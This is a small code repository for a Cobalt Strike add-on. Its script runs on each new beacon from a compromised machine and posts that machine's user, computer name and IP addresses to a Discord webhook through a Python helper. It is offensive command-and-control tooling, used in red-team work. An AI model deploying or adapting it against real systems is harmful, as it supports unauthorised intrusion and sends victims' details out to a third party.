├── README.md ├── notify.cna └── request.py /README.md: -------------------------------------------------------------------------------- 1 | # BeaconNotifier-Discord 2 | Cobalt strike CNA script to notify you via Discord whenever there is a new beacon. 3 | 4 | Make sure you have python3 installed 5 | 6 | Steps: 7 | 8 | 1) Create a Discord Server and get a Webhook URL (Server settings > Integration > Webhooks > Create/New_Webhooks > Copy Webhook URL) 9 | 2) Paste the URL in request.py 10 | 3) Edit the path of request.py in notify.cna 11 | 4) Edit the message as you want (Optional) 12 | 5) Run the cna as following: 13 | 14 | ./agscript [C2 IP] [C2 Port] [username] [C2 password] [path to cna] 15 | 16 | 17 | ![image](https://user-images.githubusercontent.com/21979646/151166400-26fbd802-e8fa-4a72-afb6-b334fb935c83.png) 18 | 19 | 20 | 21 | 22 | Reference: 23 | 24 | https://download.cobaltstrike.com/aggressor-script/functions.html 25 | https://stackoverflow.com/questions/62731561/discord-send-message-only-from-python-app-to-discord-channel-one-way-communic 26 | -------------------------------------------------------------------------------- /notify.cna: -------------------------------------------------------------------------------- 1 | #Change request path 2 | #You can change CS to identify different CS instances 3 | 4 | $pythonPath = "/PATH/request.py"; 5 | 6 | on beacon_initial { 7 | $computer = beacon_info($1, "computer"); 8 | $external = beacon_info($1, "external"); 9 | $internal = beacon_info($1, "internal"); 10 | $user = beacon_info($1, "user"); 11 | $beacon_text = "================================ 12 | New Beacon from CS! 13 | User : $user 14 | Computer Name : $computer 15 | External IP : $external 16 | Internal IP : $internal 17 | ================================"; 18 | @command = @('python3',$pythonPath,$beacon_text); 19 | exec(@command); 20 | } 21 | 22 | 23 | -------------------------------------------------------------------------------- /request.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | 4 | #Change webhook here 5 | webhookurl = "XXXXXXXXXXXXX" 6 | data = {"content": str(sys.argv[1])} 7 | response = requests.post(webhookurl, json=data) 8 | print(response.status_code) 9 | print(response.content) 10 | --------------------------------------------------------------------------------